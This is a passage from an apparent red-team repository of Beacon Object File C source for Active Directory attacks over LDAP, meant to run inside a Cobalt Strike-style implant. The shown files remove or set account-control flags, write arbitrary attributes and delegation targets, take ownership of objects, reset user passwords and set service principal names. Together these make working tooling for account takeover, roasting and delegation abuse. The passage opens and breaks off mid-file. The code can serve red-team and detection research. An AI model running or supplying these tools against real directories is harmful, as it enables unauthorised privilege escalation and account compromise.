            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    char* targetDN = NULL;
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) MSVCRT$strcpy(targetDN, targetIdentifier);
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Get current UAC value
    LDAPMessage* searchResult = NULL;
    char* attrs[] = { "userAccountControl", NULL };
    ULONG result = WLDAP32$ldap_search_s(ld, targetDN, LDAP_SCOPE_BASE, "(objectClass=*)", attrs, 0, &searchResult);

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to read current UAC");
        MSVCRT$free(targetDN);
        if (defaultNC) MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    DWORD currentUAC = 0;
    LDAPMessage* entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (entry) {
        char** values = WLDAP32$ldap_get_values(ld, entry, "userAccountControl");
        if (values && values[0]) {
            currentUAC = (DWORD)MSVCRT$strtol(values[0], NULL, 10);
            WLDAP32$ldap_value_free(values);
        }
    }
    WLDAP32$ldap_msgfree(searchResult);

    DWORD newUAC = currentUAC & ~flagsToRemove;

    char uacString[32];
    MSVCRT$_snprintf(uacString, sizeof(uacString), "%lu", newUAC);

    char* uac_values[] = { uacString, NULL };
    LDAPModA uac_mod;
    uac_mod.mod_op = LDAP_MOD_REPLACE;
    uac_mod.mod_type = "userAccountControl";
    uac_mod.mod_vals.modv_strvals = uac_values;

    LDAPModA* mods[] = { &uac_mod, NULL };

    result = WLDAP32$ldap_modify_s(ld, targetDN, mods);

    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully removed UAC flags");
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to modify UAC");
        PrintLdapError("Modify UAC", result);
    }

    MSVCRT$free(targetDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/set/set-attribute.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: target_identifier, is_dn, attribute, value, search_ou, dc_address, use_ldaps
    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* attribute = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* value = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }

    if (!attribute || MSVCRT$strlen(attribute) == 0) {
        return;
    }

    if (!value || MSVCRT$strlen(value) == 0) {
        return;
    }

    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    char* defaultNC = NULL;
    if (!isTargetDN) {
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    char* targetDN = NULL;
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) MSVCRT$strcpy(targetDN, targetIdentifier);
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    char* attr_values[] = { value, NULL };
    LDAPModA attr_mod;
    attr_mod.mod_op = LDAP_MOD_REPLACE;
    attr_mod.mod_type = attribute;
    attr_mod.mod_vals.modv_strvals = attr_values;

    LDAPModA* mods[] = { &attr_mod, NULL };

    ULONG result = WLDAP32$ldap_modify_s(ld, targetDN, mods);

    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully set '%s' to '%s'", attribute, value);
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to set attribute");
        PrintLdapError("Set attribute", result);
    }

    MSVCRT$free(targetDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/set/set-delegation.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: target_identifier, is_dn, spn, search_ou, dc_address, use_ldaps
    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* spn = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }

    if (!spn || MSVCRT$strlen(spn) == 0) {
        return;
    }

    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    char* defaultNC = NULL;
    if (!isTargetDN) {
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    char* targetDN = NULL;
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) MSVCRT$strcpy(targetDN, targetIdentifier);
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    char* spn_values[] = { spn, NULL };
    LDAPModA spn_mod;
    spn_mod.mod_op = LDAP_MOD_REPLACE;
    spn_mod.mod_type = "msDS-AllowedToDelegateTo";
    spn_mod.mod_vals.modv_strvals = spn_values;

    LDAPModA* mods[] = { &spn_mod, NULL };

    ULONG result = WLDAP32$ldap_modify_s(ld, targetDN, mods);

    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully set delegation SPN (replaced all existing)");
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to set delegation");
        PrintLdapError("Set delegation", result);
    }

    MSVCRT$free(targetDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/set/set-owner.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"
#include "acl_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: target_identifier, is_target_dn, owner_identifier, is_owner_dn, search_ou, dc_address, use_ldaps
    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* ownerIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isOwnerDN = BeaconDataInt(&parser);
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }

    if (!ownerIdentifier || MSVCRT$strlen(ownerIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Owner identifier is required");
        return;
    }

    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = NULL;
    if (!isTargetDN || !isOwnerDN) {
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Resolve target DN
    char* targetDN = NULL;
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) {
            MSVCRT$strcpy(targetDN, targetIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Resolve owner DN and get SID
    char* ownerDN = NULL;
    PSID ownerSid = NULL;
    
    if (isOwnerDN) {
        size_t len = MSVCRT$strlen(ownerIdentifier) + 1;
        ownerDN = (char*)MSVCRT$malloc(len);
        if (ownerDN) {
            MSVCRT$strcpy(ownerDN, ownerIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        ownerDN = FindObjectDN(ld, ownerIdentifier, searchBase);
        if (!ownerDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Owner '%s' not found", ownerIdentifier);
            MSVCRT$free(targetDN);
            if (defaultNC) MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Owner DN: %s", ownerDN);
    }

    // Get the SID of the new owner
    ownerSid = GetObjectSid(ld, ownerDN);
    if (!ownerSid) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to retrieve owner SID");
        MSVCRT$free(targetDN);
        if (ownerDN) MSVCRT$free(ownerDN);
        if (defaultNC) MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    // Convert SID to string for display
    char* ownerSidStr = SidToString(ownerSid);
    if (ownerSidStr) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Owner SID: %s", ownerSidStr);
        MSVCRT$free(ownerSidStr);
    }

    // Read current security descriptor
    BERVAL* sdBerval = ReadSecurityDescriptor(ld, targetDN);
    if (!sdBerval) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to read security descriptor");
        MSVCRT$free(ownerSid);
        MSVCRT$free(targetDN);
        if (ownerDN) MSVCRT$free(ownerDN);
        if (defaultNC) MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    // Convert to absolute format for modification
    PSECURITY_DESCRIPTOR pSD = ConvertBervalToSecurityDescriptor(sdBerval);
    if (!pSD) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to convert security descriptor to absolute format");
        MSVCRT$free(sdBerval->bv_val);
        MSVCRT$free(sdBerval);
        MSVCRT$free(ownerSid);
        MSVCRT$free(targetDN);
        if (ownerDN) MSVCRT$free(ownerDN);
        if (defaultNC) MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    // Free the original BERVAL as we now have an absolute SD
    MSVCRT$free(sdBerval->bv_val);
    MSVCRT$free(sdBerval);

    // Set the new owner
    if (!ADVAPI32$SetSecurityDescriptorOwner(pSD, ownerSid, FALSE)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to set security descriptor owner");
        MSVCRT$free(pSD);
        MSVCRT$free(ownerSid);
        MSVCRT$free(targetDN);
        if (ownerDN) MSVCRT$free(ownerDN);
        if (defaultNC) MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    // Convert back to self-relative format for writing
    BERVAL* newSdBerval = ConvertSecurityDescriptorToBerval(pSD);
    if (!newSdBerval) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to convert security descriptor to self-relative format");
        MSVCRT$free(pSD);
        MSVCRT$free(ownerSid);
        MSVCRT$free(targetDN);
        if (ownerDN) MSVCRT$free(ownerDN);
        if (defaultNC) MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    // Write the modified security descriptor back
    BOOL success = WriteSecurityDescriptor(ld, targetDN, newSdBerval);

    if (success) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully set owner");
        BeaconPrintf(CALLBACK_OUTPUT, "[+] New owner: %s", ownerDN ? ownerDN : ownerIdentifier);
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to write security descriptor");
        BeaconPrintf(CALLBACK_ERROR, "[!] Note: WriteOwner permission or administrative rights required");
    }

    // Cleanup
    MSVCRT$free(newSdBerval->bv_val);
    MSVCRT$free(newSdBerval);
    MSVCRT$free(pSD);
    MSVCRT$free(ownerSid);
    MSVCRT$free(targetDN);
    if (ownerDN) MSVCRT$free(ownerDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}

================================================
FILE: AD-BOF/LDAP-BOF/src/set/set-password.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);
    
    // Parse arguments: user_identifier, is_user_dn, old_password, new_password, 
    // search_ou, dc_address, use_ldaps
    char* userIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isUserDN = BeaconDataInt(&parser);
    char* newPassword = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* oldPassword = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);
    
    if (!userIdentifier || MSVCRT$strlen(userIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] User identifier is required");
        return;
    }
    
    if (!newPassword || MSVCRT$strlen(newPassword) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] New password is required");
        return;
    }
    
    BOOL hasOldPassword = (oldPassword && MSVCRT$strlen(oldPassword) > 0);
    BOOL isAdminReset = !hasOldPassword;
    
    // Force LDAPS for admin reset OR if explicitly requested
    BOOL requireLdaps = isAdminReset || useLdaps;
    
    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }
    
    // Get default naming context - will build from hostname if possible
    char* userDN = NULL;
    char* defaultNC = NULL;
    if (!isUserDN) {
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            CleanupLDAP(ld);
            return;
        }
    }
    
    // Resolve user DN
    if (isUserDN) {
        // User identifier is already a DN
        size_t len = MSVCRT$strlen(userIdentifier) + 1;
        userDN = (char*)MSVCRT$malloc(len);
        if (userDN) {
            MSVCRT$strcpy(userDN, userIdentifier);
        }
    } else {
        // Search for user by sAMAccountName
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        userDN = FindObjectDN(ld, userIdentifier, searchBase);
        
        if (!userDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to resolve user DN");
            BeaconPrintf(CALLBACK_ERROR, "[!] User '%s' not found", userIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            CleanupLDAP(ld);
            return;
        }
    }
    
    // Encode passwords
    BERVAL* oldPasswordBerval = NULL;
    BERVAL* newPasswordBerval = NULL;
    
    if (!isAdminReset) {
        oldPasswordBerval = EncodePassword(oldPassword);
        if (!oldPasswordBerval) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to encode old password");
            if (defaultNC) MSVCRT$free(defaultNC);
            MSVCRT$free(userDN);
            CleanupLDAP(ld);
            return;
        }
    }
    
    newPasswordBerval = EncodePassword(newPassword);
    if (!newPasswordBerval) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to encode new password");
        if (oldPasswordBerval) {
            MSVCRT$free(oldPasswordBerval->bv_val);
            MSVCRT$free(oldPasswordBerval);
        }
        if (defaultNC) MSVCRT$free(defaultNC);
        MSVCRT$free(userDN);
        CleanupLDAP(ld);
        return;
    }
    
    // Prepare LDAP modification
    ULONG result;
    
    if (isAdminReset) {
        // Administrative reset: use LDAP_MOD_REPLACE
        BERVAL* password_bervals[] = { newPasswordBerval, NULL };
        LDAPModA password_mod;
        password_mod.mod_op = LDAP_MOD_REPLACE | LDAP_MOD_BVALUES;
        password_mod.mod_type = "unicodePwd";
        password_mod.mod_vals.modv_bvals = password_bervals;
        
        LDAPModA* mods[] = { &password_mod, NULL };
        
        result = WLDAP32$ldap_modify_s(ld, userDN, mods);
    } else {
        // User password change: delete old, add new
        BERVAL* old_password_bervals[] = { oldPasswordBerval, NULL };
        LDAPModA old_password_mod;
        old_password_mod.mod_op = LDAP_MOD_DELETE | LDAP_MOD_BVALUES;
        old_password_mod.mod_type = "unicodePwd";
        old_password_mod.mod_vals.modv_bvals = old_password_bervals;
        
        BERVAL* new_password_bervals[] = { newPasswordBerval, NULL };
        LDAPModA new_password_mod;
        new_password_mod.mod_op = LDAP_MOD_ADD | LDAP_MOD_BVALUES;
        new_password_mod.mod_type = "unicodePwd";
        new_password_mod.mod_vals.modv_bvals = new_password_bervals;
        
        LDAPModA* mods[] = { &old_password_mod, &new_password_mod, NULL };
        
        result = WLDAP32$ldap_modify_s(ld, userDN, mods);
    }
    
    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Password operation successful");
        BeaconPrintf(CALLBACK_OUTPUT, "[+] User DN: %s", userDN);
        if (isAdminReset) {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Password reset by administrator");
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Password changed by user");
        }
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Password operation failed");
        PrintLdapError("Password modification", result);
        
        // Provide helpful hints
        if (result == LDAP_INSUFFICIENT_RIGHTS) {
            if (isAdminReset) {
                BeaconPrintf(CALLBACK_ERROR, "[!] Insufficient permissions - admin rights required for password reset");
            } else {
                BeaconPrintf(CALLBACK_ERROR, "[!] Insufficient permissions or incorrect old password");
            }
        } else if (result == LDAP_NO_SUCH_OBJECT) {
            BeaconPrintf(CALLBACK_ERROR, "[!] User object does not exist");
        } else if (result == LDAP_CONSTRAINT_VIOLATION) {
            BeaconPrintf(CALLBACK_ERROR, "[!] New password does not meet domain password policy requirements");
        } else if (result == LDAP_INVALID_CREDENTIALS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Invalid old password");
        }
    }
    
    // Cleanup
    if (oldPasswordBerval) {
        MSVCRT$free(oldPasswordBerval->bv_val);
        MSVCRT$free(oldPasswordBerval);
    }
    if (newPasswordBerval) {
        MSVCRT$free(newPasswordBerval->bv_val);
        MSVCRT$free(newPasswordBerval);
    }
    if (defaultNC) MSVCRT$free(defaultNC);
    if (userDN) MSVCRT$free(userDN);
    CleanupLDAP(ld);
}

================================================
FILE: AD-BOF/LDAP-BOF/src/set/set-spn.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: target_identifier, is_dn, spn, search_ou, dc_address, use_ldaps
    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* spn = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }

    if (!spn || MSVCRT$strlen(spn) == 0) {
        return;
    }

    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    char* defaultNC = NULL;
    if (!isTargetDN) {
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    char* targetDN = NULL;
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) MSVCRT$strcpy(targetDN, targetIdentifier);
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    char* spn_values[] = { spn, NULL };
    LDAPModA spn_mod;
    spn_mod.mod_op = LDAP_MOD_REPLACE;
    spn_mod.mod_type = "servicePrincipalName";
    spn_mod.mod_vals.modv_strvals = spn_values;

    LDAPModA* mods[] = { &spn_mod, NULL };

    ULONG result = WLDAP32$ldap_modify_s(ld, targetDN, mods);

    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully set SPN (replaced all existing)");
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to set SPN");
        PrintLdapError("Set SPN", result);
    }

    MSVCRT$free(targetDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/set/set-uac.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

DECLSPEC_IMPORT long __cdecl MSVCRT$strtol(const char* str, char** endptr, int base);

typedef struct {
    const char* name;
    DWORD value;
} UAC_FLAG_MAP;

static const UAC_FLAG_MAP uacFlags[] = {
    {"SCRIPT", UF_SCRIPT},
    {"ACCOUNTDISABLE", UF_ACCOUNTDISABLE},
    {"HOMEDIR_REQUIRED", UF_HOMEDIR_REQUIRED},
    {"LOCKOUT", UF_LOCKOUT},
    {"PASSWD_NOTREQD", UF_PASSWD_NOTREQD},
    {"PASSWD_CANT_CHANGE", UF_PASSWD_CANT_CHANGE},
    {"ENCRYPTED_TEXT_PWD_ALLOWED", UF_ENCRYPTED_TEXT_PWD_ALLOWED},
    {"TEMP_DUPLICATE_ACCOUNT", UF_TEMP_DUPLICATE_ACCOUNT},
    {"NORMAL_ACCOUNT", UF_NORMAL_ACCOUNT},
    {"INTERDOMAIN_TRUST_ACCOUNT", UF_INTERDOMAIN_TRUST_ACCOUNT},
    {"WORKSTATION_TRUST_ACCOUNT", UF_WORKSTATION_TRUST_ACCOUNT},
    {"SERVER_TRUST_ACCOUNT", UF_SERVER_TRUST_ACCOUNT},
    {"DONT_EXPIRE_PASSWD", UF_DONT_EXPIRE_PASSWD},
    {"MNS_LOGON_ACCOUNT", UF_MNS_LOGON_ACCOUNT},
    {"SMARTCARD_REQUIRED", UF_SMARTCARD_REQUIRED},
    {"TRUSTED_FOR_DELEGATION", UF_TRUSTED_FOR_DELEGATION},
    {"NOT_DELEGATED", UF_NOT_DELEGATED},
    {"USE_DES_KEY_ONLY", UF_USE_DES_KEY_ONLY},
    {"DONT_REQ_PREAUTH", UF_DONT_REQ_PREAUTH},
    {"PASSWORD_EXPIRED", UF_PASSWORD_EXPIRED},
    {"TRUSTED_TO_AUTH_FOR_DELEGATION", UF_TRUSTED_TO_AUTH_FOR_DELEGATION},
    {"NO_AUTH_DATA_REQUIRED", UF_NO_AUTH_DATA_REQUIRED},
    {"PARTIAL_SECRETS_ACCOUNT", UF_PARTIAL_SECRETS_ACCOUNT},
    {NULL, 0}
};

DWORD ParseUACFlags(const char* flagString) {
    if (!flagString || MSVCRT$strlen(flagString) == 0) return 0;
    DWORD result = 0;
    char buffer[512];
    MSVCRT$_snprintf(buffer, sizeof(buffer), "%s", flagString);

    char* token = buffer;
    char* next = buffer;

    while (*next) {
        while (*next && *next != ',') next++;
        char savedChar = *next;
        *next = '\0';

        while (*token == ' ' || *token == '\t') token++;
        char* end = token + MSVCRT$strlen(token) - 1;
        while (end > token && (*end == ' ' || *end == '\t')) {
            *end = '\0';
            end--;
        }

        if (MSVCRT$strlen(token) > 0) {
            for (int i = 0; uacFlags[i].name != NULL; i++) {
                if (MSVCRT$strcmp(token, uacFlags[i].name) == 0) {
                    result |= uacFlags[i].value;
                    break;
                }
            }
        }

        if (savedChar) {
            *next = savedChar;
            next++;
            token = next;
        } else {
            break;
        }
    }
    return result;
}

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: target_identifier, is_dn, flags, search_ou, dc_address, use_ldaps
    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* flagsValue = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }

    if (!flagsValue || MSVCRT$strlen(flagsValue) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Flags are required (e.g., NORMAL_ACCOUNT,DONT_EXPIRE_PASSWD)");
        return;
    }

    DWORD newUAC = ParseUACFlags(flagsValue);
    if (newUAC == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] No valid flags parsed");
        return;
    }

    // Safety check: ensure account type flag is present
    if ((newUAC & UF_ACCOUNT_TYPE_MASK) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[!] WARNING: No account type flag specified!");
        BeaconPrintf(CALLBACK_ERROR, "[!] Include NORMAL_ACCOUNT, WORKSTATION_TRUST_ACCOUNT, or SERVER_TRUST_ACCOUNT");
        return;
    }

    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    char* defaultNC = NULL;
    if (!isTargetDN) {
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    char* targetDN = NULL;
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) MSVCRT$strcpy(targetDN, targetIdentifier);
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
